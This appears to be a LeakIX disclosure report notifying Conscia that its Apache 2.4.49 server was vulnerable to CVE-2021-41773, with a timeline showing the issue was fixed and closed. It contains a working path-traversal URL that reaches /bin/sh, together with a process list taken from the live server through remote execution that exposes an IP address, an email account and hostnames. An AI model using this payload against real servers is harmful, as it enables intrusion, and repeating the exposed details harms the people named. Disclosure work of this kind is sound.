LeakIX report : Conscia

Creation
Validation
Communication & fix
Disclosure

Conscia / Apache 2.4.49 vulnerable to CVE-2021-41773

Deleted user reported 2021-10-08

Your server was found vulnerable to CVE-2021-41773.

Attackers can read any file from your server.

Under some circumstances attackers are able to execute code on your server.

IP:

185.150.157.51

Port:

443

Detected protocol:

https

Vulnerable URL:

https://secure-s3.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

Found processes trough Apache RCE:

/usr/lib/systemd/systemd�--system�--deserialize�25�

/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�
dovecot/pop3-login�


dovecot/imap-login�
dovecot/imap-login�





/usr/sbin/sshd�-d�













dovecot/lmtp�-l�



/usr/lib/systemd/systemd-logind�
/usr/sbin/pure-certd�-r�/usr/local/bin/pureftpd_sni.sh�-s�/var/run/pure-certd.sock�
dovecot/lmtp�-l�
/usr/bin/dbus-daemon�--system�--address=systemd:�--nofork�--nopidfile�--systemd-activation�
/usr/sbin/networkmanager�--no-daemon�
dovecot/lmtp�-l�
/usr/sbin/atd�-f�
/sbin/agetty�--noclear�tty1�linux�

dovecot/imap-login�

dovecot/pop3-login�

dovecot/lmtp�-l�
dovecot/imap-login�
dovecot/lmtp�-l�
dovecot/pop3-login�
/bin/sh�/usr/bin/mysqld_safe�--basedir=/usr�
dovecot/imap-login�
dovecot/pop3-login�
dovecot/imap-login [83.162.252.82 tls proxy]
dovecot/imap-login�

dovecot/lmtp�-l�
dovecot/lmtp�-l�


lfd - sleeping
dovecot/pop3-login�
/usr/sbin/httpd�-dforeground�
dovecot/imap [info@versloot-steenkunst.nl 83.162.252.82 idle]
dovecot/imap-login [83.162.252.82 tls proxy]
dovecot/imap [info@versloot-steenkunst.nl 83.162.252.82 idle]


/usr/sbin/crond�-n�
/usr/sbin/lvmetad�-f�

/usr/bin/vgauthservice�-s�
/usr/bin/vmtoolsd�
/usr/sbin/httpd�-dforeground�
/usr/sbin/httpd�-dforeground�


dovecot/imap [info@versloot-steenkunst.nl 83.162.252.82]
dovecot/lmtp�-l�
/usr/local/patchman/patchmand�
dovecot/pop3-login�
/usr/sbin/dovecot�-f�
/usr/sbin/pure-ftpd�/etc/pure-ftpd.conf�
dovecot/anvil [36 connections]
/usr/sbin/exim�-bd�-q1h�

/usr/sbin/httpd�-dforeground�
dovecot/imap-login�
dovecot/imap-login�


/usr/sbin/httpd�-dforeground�
/usr/local/directadmin/directadmin�
/usr/lib/polkit-1/polkitd�--no-debug�
dovecot/imap-login�
dovecot/imap-login�
/usr/sbin/httpd�-dforeground�

/usr/sbin/httpd�-dforeground�
/usr/sbin/httpd�-dforeground�

php-fpm: pool hestonre�������������������������������������������������
dovecot/imap-login�

/usr/sbin/httpd�-dforeground�


dovecot/pop3-login�
/usr/sbin/httpd�-dforeground�
php-fpm: pool wetering�������������������������������������������������
/usr/sbin/httpd�-dforeground�
/usr/lib/systemd/systemd-udevd�
/usr/sbin/irqbalance�--foreground�
/bin/sh�
/bin/sh�


dovecot/pop3-login�

dovecot/imap-login�

dovecot/lmtp�-l�
dovecot/imap-login�
/usr/bin/python2�-es�/usr/sbin/tuned�-l�-p�
/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�


dovecot/pop3-login�
/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�
/usr/sbin/nagent�-f�/home/nagent/nagent.conf�

dovecot/imap-login�
dovecot/imap-login�
php-fpm: master process (/usr/local/php56/etc/php-fpm.conf)������������
php-fpm: master process (/usr/local/php73/etc/php-fpm.conf)������������
php-fpm: master process (/usr/local/php74/etc/php-fpm.conf)������������
/usr/sbin/httpd�-dforeground�
dovecot/pop3-login�

dovecot/pop3-login�
dovecot/lmtp�-l�
/usr/sbin/named�-u�named�

dovecot/lmtp�-l�
dovecot/pop3-login�


tmux�
-bash�
-bash�
-bash�
-bash�
/opt/puppetlabs/puppet/bin/ruby�/opt/puppetlabs/puppet/bin/puppet�agent�--no-daemonize�

top�
dovecot/pop3-login�



dovecot/lmtp�-l�

dovecot/lmtp�-l�

/usr/sbin/rsyslogd�-n�


/usr/local/bin/freshclam�-d�


/usr/local/sbin/clamd�--foreground=yes�






dovecot/log�

dovecot/config�
dovecot/stats [55 connections]
dovecot/auth [0 wait, 0 passdb, 0 userdb]



dovecot/lmtp�-l�

dovecot/pop3-login�
dovecot/pop3-login�













/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�
/usr/local/directadmin/directadmin�



dovecot/lmtp�-l�


















dovecot/imap-login [83.162.252.82 tls proxy]
dovecot/imap-login�


/usr/lib/systemd/systemd-journald�
dovecot/lmtp�-l�

dovecot/pop3-login�





/usr/sbin/mysqld�--basedir=/usr�--datadir=/var/lib/mysql�--plugin-dir=/usr/lib64/mysql/plugin�--log-error=/var/lib/mysql/ws1.damecon.com.err�--pid-file=ws1.damecon.com.pid�
/usr/local/directadmin/da-popb4smtp�


cat�/proc/self/cmdline�

Found by Apache2449TraversalPlugin 2021-10-08

Report created by

deleted-user 2021-10-08

Report approved by

BloodyShell 2021-10-08

New PDF report generated by system 2021-10-08

Report edited by

BloodyShell 2021-10-08

Report approved by

BloodyShell 2021-10-08

New PDF report generated by system 2021-10-08

Report dispatched to ...@... by system 2021-10-08

Report marked as fixed by

BloodyShell 2021-10-13

Report closed by

BloodyShell 2021-10-13

New PDF report generated by system 2021-10-13

Information

Owner Conscia

Created 2021-10-08 16:59

Updated 2021-10-13 14:57

Fixed true

Contacts

i...@conscia.com

Status

Status closed

Hosting contacted false

CERT contacted false

Download report